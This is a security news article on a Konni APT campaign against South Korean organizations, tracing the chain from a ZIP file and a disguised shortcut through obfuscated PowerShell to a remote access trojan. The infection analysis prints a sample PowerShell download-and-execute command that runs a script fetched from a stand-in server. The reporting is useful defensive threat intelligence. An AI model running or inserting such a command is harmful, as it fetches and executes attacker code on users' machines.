Konni APT Hackers Using Multi-Stage Malware to Attack Organizations

A sophisticated multi-stage malware campaign linked to the North Korean Konni APT group has been detected targeting organizations primarily in South Korea.

Security researchers uncovered the operation on April 29, 2025, revealing a complex attack chain designed to establish persistent access and exfiltrate sensitive information from compromised systems.

The campaign demonstrates the continued evolution of Konni’s capabilities and their persistent focus on South Korean entities.

The attack begins with a seemingly innocuous ZIP file containing a disguised .lnk shortcut that, when executed, triggers an obfuscated PowerShell script.

This initial stage acts as the infection vector, connecting to command-and-control infrastructure to download and execute additional malicious payloads.

The multi-stage approach allows the attackers to maintain a low profile while establishing deeper access into targeted networks.

Broadcom analysts identified the final payload as a sophisticated Remote Access Trojan (RAT) specifically engineered to establish persistence, collect system information, harvest directory listings, and exfiltrate the gathered data to compromised command-and-control servers.

The researchers noted that this campaign represents a significant advancement in Konni’s technical capabilities compared to previous operations.

The timing and targets suggest possible intelligence gathering motives, aligning with North Korea’s long-standing cyber espionage efforts against South Korean organizations.

Security experts warn that the campaign could expand to additional targets across the region if left unchecked.

Infection Mechanism Analysis

The infection chain begins when users interact with a weaponized ZIP archive containing what appears to be a legitimate document but is actually a malicious .lnk shortcut.

When executed, this shortcut launches PowerShell with heavily obfuscated commands designed to evade detection. A typical command structure might resemble:-

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$c='IEX (New-Object Net.WebClient).DownloadString(''http://compromised-server.com/payload.ps1'')'; iex $c"

This first-stage script performs system reconnaissance and establishes persistence through registry modifications or scheduled tasks before downloading the second-stage loader.

The loader then decrypts and deploys the final RAT payload, which communicates with the C2 server using encrypted channels to transmit stolen data.

Security products have identified numerous indicators associated with this campaign, including behavior-based detections like SONAR.Powershell!g20 and file-based detections such as Trojan.Gen.NPE.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy